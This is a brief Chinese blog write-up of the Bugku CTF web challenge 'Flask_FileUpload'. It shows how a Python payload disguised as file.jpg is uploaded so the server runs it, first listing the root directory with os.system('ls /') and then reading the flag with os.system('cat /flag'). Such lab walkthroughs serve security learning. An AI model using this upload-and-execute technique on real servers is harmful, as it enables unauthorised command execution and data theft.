Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码 
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码 
import os
os.system('cat /flag ')
相关推荐
镜宇秋霖丶16 小时前
2026.5.6@霖宇博客制作中遇见的问题
前端·javascript·vue.js
Waay16 小时前
“红帽系统管理二”知识点问答题:第11章 管理网络安全
网络·安全·web安全
QQ24221997916 小时前
基于python+微信小程序的家教管理系统_mh3j9
开发语言·python·微信小程序
RSTJ_162517 小时前
PYTHON+AI LLM DAY THREETY-SEVEN
开发语言·人工智能·python
郝学胜-神的一滴17 小时前
深度学习优化核心:梯度下降与网络训练全解析
数据结构·人工智能·python·深度学习·算法·机器学习
Aision_17 小时前
Agent 为什么需要 Checkpoint?
人工智能·python·gpt·langchain·prompt·aigc·agi
清水白石00817 小时前
《Python性能深潜:从对象分配开销到“小对象风暴”的破解之道(含实战与最佳实践)》
开发语言·python
小李子呢021118 小时前
前端八股Vue---Vue-router路由管理器
前端·javascript·vue.js
Land032918 小时前
RPA工具选型技术指南:架构差异与实测数据
python·自动化·rpa
kafei_*18 小时前
VScode 添加 UV虚拟环境方法
vscode·python·uv
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法04零基础教你claude code 接入 deepseek V405Linux 核弹级高危漏洞 CVE-2026-31431 完整修复指南06CC-Switch & Claude 基于 Linux 服务器安装使用指南07CVE-2026-31431 (Copy Fail) 漏洞复现与验证记录08裂开!ChatGPT 居然开始要手机号验证,附详细解决方法092026 年 AI 辅助编程工具全景对比:Copilot、Cursor、Claude Code 与 Codex 深度解析10【AI】2026 年具身智能模型和世界模型总结